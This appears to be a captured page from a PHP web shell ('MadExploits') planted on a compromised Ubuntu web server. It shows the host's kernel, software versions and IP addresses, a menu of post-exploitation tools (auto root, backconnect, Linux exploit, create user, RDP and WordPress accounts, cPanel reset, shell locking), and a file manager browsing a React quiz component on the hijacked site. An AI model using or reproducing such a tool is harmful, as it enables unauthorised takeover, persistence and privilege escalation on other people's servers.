Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.52
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
src /
components /
[ HOME SHELL ]
Name
Size
Permission
Action
Question.css
984
B
-rw-rw-rw-
Question.tsx
1.76
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Question.tsx
import React from "react"; import "./Question.css"; type Props = { question: string; answer: string[]; callback: any; userAnswer: any; questionNr: number; totalQuestion: number; }; const Question: React.FC<Props> = ({ question, answer, callback, userAnswer, questionNr, totalQuestion, }) => ( <div> <p className="number"> Question: {questionNr} / {totalQuestion} </p> <p dangerouslySetInnerHTML={{ __html: question }} /> <div> {answer.map((ans) => ( <div key={ans}> <button className="option" disabled={userAnswer} value={ans} onClick={callback} style={{ backgroundColor: userAnswer ? ans === userAnswer.correctAnswer ? "green" : ans === userAnswer.answer ? "red" : "initial" : "initial", color: userAnswer && (ans === userAnswer.correctAnswer || ans === userAnswer.answer) ? "white" : "black", }} > <span dangerouslySetInnerHTML={{ __html: ans }} /> </button> </div> ))} </div> {userAnswer && ( <div> {userAnswer.answer === userAnswer.correctAnswer ? ( <p style={{ color: "#00d26a", fontWeight: 750 }}> ✅Correct! You have guessed the right answer. </p> ) : ( <p style={{ color: "#f92f60", fontWeight: 750 }}> ❌Wrong! The correct answer is {userAnswer.correctAnswer}. </p> )} </div> )} </div> ); export default Question;
Close